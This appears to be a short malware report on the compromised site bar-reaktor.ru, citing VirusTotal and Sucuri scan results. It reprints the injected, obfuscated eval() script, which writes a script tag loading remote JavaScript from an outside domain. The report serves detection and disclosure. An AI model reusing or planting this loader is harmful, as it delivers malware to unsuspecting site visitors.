See: https://www.virustotal.com/nl/url/d3d2eab443b0dfd24420b16502a57a37fc27a94c57dfbb61648c1fccedea3ce5/analysis/1415135086/
and IP badness history: https://www.virustotal.com/nl/ip-address/213.174.157.137/information/
Flagged as malicious by Bitdefender’s TrafficLight.
Infected with Malware according to Succuri’s: Website Malware malware-entry-mwanomalysp8 htxp://bar-reaktor.ru ( View Payload )
Website Malware malware-entry-mwanomalysp8 htxp://bar-reaktor.ru/forum ( View Payload )
Website Malware malware-entry-mwanomalysp8 htxp://bar-reaktor.ru/gb ( View Payload )
Website Malware malware-entry-mwanomalysp8 htxp://bar-reaktor.ru/photo ( View Payload )
Website Malware malware-entry-mwanomalysp8 htxp://bar-reaktor.ru/blog ( View Payload )
Website Malware malware-entry-mwanomalysp8 htt\xp://bar-reaktor.ru/forum/77 ( View Payload )
Anomaly behavior detected (possible malware). Details: htxp://sucuri.net/malware/malware-entry-mwanomalysp8
Severity: Potentially Suspicious
Reason: Suspicious JavaScript code injection.
Details: Procedure: unescape has been called with a string containing hidden JavaScript code
<script>eval(function(zq,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){zq=zq.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return zq}('8.9("<"+"0>a=b"+"7;c=\\"4\\";<\\/0>ɘ 2=\\"1\\" 6=\\"3/1\\" d=\\"l-k\\" m=\\"h"+"j://i.e/f"+"5.g\\"><\\/0>");',23,23,'script|JavaScript|language|text|1614815||type|007|document|write|izs|23|tm|charset|com|j6|php||mekadr|ttp|1251|windows|src'.split('|'),0,{}))%0A</script>
12 instances.
pol